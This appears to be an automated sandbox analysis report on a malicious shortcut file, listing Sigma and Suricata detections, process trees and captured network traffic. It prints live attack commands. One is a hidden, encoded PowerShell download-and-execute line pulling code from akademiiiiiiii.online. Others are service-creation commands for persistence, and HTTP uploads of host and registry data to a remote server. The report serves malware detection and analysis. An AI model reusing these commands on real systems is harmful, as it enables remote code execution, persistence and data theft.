Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Temp\myRdpService.exe nonbo1, ParentImage: C:\Windows\Temp\myRdpService.exe, ParentProcessId: 4280, ParentProcessName: myRdpService.exe, ProcessCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 7708, ProcessName: cmd.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 1336, ProcessName: net.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto , ProcessId: 3012, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA==" , CommandLine: POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA==" , CommandLine|base64offset|contains: <(D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7336, ParentProcessName: cmd.exe, ProcessCommandLine: POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA==" , ProcessId: 4012, ProcessName: powershell.exe

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 4596, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: SC.EXE Query Execution

Source: Process started

Author: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8976, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 9032, ProcessName: sc.exe

Sigma detected: Start Windows Service Via Net.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 1336, ProcessName: net.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T14:24:35.230267+0100	2803305	3	Unknown Traffic	192.168.11.20	49758	104.21.93.157	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T14:23:50.373793+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49750	104.21.93.157	80	TCP
2024-12-19T14:23:57.450365+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49752	104.21.93.157	80	TCP
2024-12-19T14:24:10.801366+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49757	104.21.93.157	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ny.lnk.d.lnk

ReversingLabs: Detection: 34%

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Source: unknown

HTTPS traffic detected: 104.21.93.157:443 -> 192.168.11.20:49749 version: TLS 1.2

Source:

Binary string: corlib.pdbpdblib.pdbU source: powershell.exe, 00000005.00000002.24431081680.000001C3F800F000.00000004.00000020.00020000.00000000.sdmp

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49762

Source: global traffic

TCP traffic: 192.168.11.20:49760 -> 23.88.71.29:8000

Source: global traffic	HTTP traffic detected: GET /t/46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36c8f3c85f8f090ed84d188970ebb9376096bba1965529122fe3306bc0716 HTTP/1.1Host: akademiiiiiiii.online
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: YoU7CJ8D9UuIg5OcyVAhnQ==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: POST /api/registry HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: application/jsonContent-Length: 102Data Raw: 22 45 37 38 35 43 39 38 31 31 35 46 36 41 45 43 30 46 46 43 35 33 35 31 35 45 32 31 39 30 33 31 45 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "E785C98115F6AEC0FFC53515E219031E\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Source: global traffic	HTTP traffic detected: POST /api/registry/upload/11b46eb9cdd81ad4c5875367ee4c05e4 HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: multipart/form-data; boundary=---------------------8dd20069db638efContent-Length: 5689Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 30 36 39 64 62 36 33 38 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 54 00 65 00 72 00 6d 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 5d 00 0d 00 0a 00 22 00 44 00 65 00 70 00 65 00 6e 00 64 00 4f 00 6e 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 22 00 3d 00 68 00 65 00 78 00 28 00 37 00 29 00 3a 00 35 00 32 00 2c 00 30 00 30 00 2c 00 35 00 30 00 2c 00 30 00 30 00 2c 00 34 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 0d 00 0a 00 22 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 37 00 22 00 0d 00 0a 00 22 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 38 00 22 00 0d 00 0a 00 22 00 45 00 72 00 72 00 6f 00 72 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 22 00 3d 00 64 00 77 00 6f 00 72 00 64 00 3a 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 31 00 0d 00 0a 00 22 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 41 00 63 00 74 00 69 00 6f 00 6e 00 73 00 22 00 3d 00 68 00 65 00 78 00 3a 00 38 00 30 00 2c 00 35 00 31 00 2c 00 30 00 31 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 33 00

Source: Joe Sandbox View

IP Address: 23.88.71.29 23.88.71.29

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49757 -> 104.21.93.157:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49750 -> 104.21.93.157:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49752 -> 104.21.93.157:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49758 -> 104.21.93.157:80

Source: global traffic	HTTP traffic detected: GET /t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d835daa8b68ca03e3a6e91f8afeb39805d8 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 177Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t/6f5b28f567618bb7b48dc18a2b5751f5791a04bac2764be3c8ead50796e3f23dacb85e6f8a1ac315e86009a6c37fef73 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.online
Source: global traffic	HTTP traffic detected: POST /t/897605e002d48fed977a6a5b9d4706b7bbd31df6c8a9bfd969709d2e0e4b69df4f41c2d72b187c25b9e6b90cbad4ddc4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Content-Type: application/jsonHost: akademiiiiiiii.onlineContent-Length: 1206
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a49096f87bb408aa2e2d2d69dbf HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 85
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a49096f87bb408aa2e2d2d69dbf HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 62
Source: global traffic	HTTP traffic detected: GET /t/7dfed9d6c790d0068121e3be7e2647c45f0e8b505415e6d80e64e63c4ebab118a2e4b6b4f36140f511645c3d908de349 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c58e5a27974bb20ec802124be99a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83b41f7dfeb496619cfd7d1f90769f1ff5 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 177
Source: global traffic	HTTP traffic detected: GET /t/7a0e36d8452d554476938e30cd0496a9a4562d83c7a848fbe65b7f7e919bbd3acf746d10e167d6954233a9fb05e9001d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.online
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 140
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 69
Source: global traffic	HTTP traffic detected: GET /t/50deddaea4c9b7d61413b0607c29d217fb59374de9f6370902e888f276715c81f7bdbec16785b6357d46b2f63cb4eabefc07543b6e01308ce4fa7ff92ceaa0f2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.online
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 200
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 97
Source: global traffic	HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 64

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 13:23:55 GMTContent-Type: application/octet-streamContent-Length: 3262Connection: keep-aliveCache-Control: no-store,no-cachePragma: no-cachecontent-disposition: attachment; filename=file; filename*=UTF-8''filecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NmuwYaEpkZiDry0soFuVMI7NSLmZ96sa3XPIJPKENAvN7goHM885h6lXc0xGIKF26YMG%2F7DPYGYwiNAm%2FBDrlNLoVqvI17y197ZCLQAL%2FFAKxMTRJXM04%2BBdYDYb4bCxAoEloW0xFD8J"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=26112&min_rtt=1789&rtt_var=31222&sent=23&recv=23&lost=0&retrans=0&sent_bytes=8763&recv_bytes=6987&delivery_rate=2438752&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Server: cloudflareCF-RAY: 8f47b5bbffed68cc-JAXserver-timing: cfL4;desc="?proto=TCP&rtt=135883&min_rtt=135883&rtt_var=67941&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=264&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 50 4b 03 04 14 00 08 00 08 00 26 b2 90 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 8f 3b 0e c2 30 10 44 af 62 6d 4f 36 50 20 84 e2 a4 41 48 69 a3 70 00 cb de 38 51 e2 8f 6c f3 bb 3d 2e 28 08 a2 a0 1c ed cc db 99 aa 79 98 85 dd 28 c4 c9 59 0e db a2 04 46 56 3a 35 59 cd e1 d2 9f 37 07 68 ea aa a3 45 a4 ec 88 e3 e4 23 cb 11 1b 39 8c 29 f9 23 62 94 23 19 11 0b e7 c9 e6 Data Ascii: PK&Y_rels/.rels;0DbmO6P AHip8Ql=.(y(YFV:5Y7hE#9)#b#

Source: global traffic	HTTP traffic detected: GET /t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineConnection: Keep-Alive
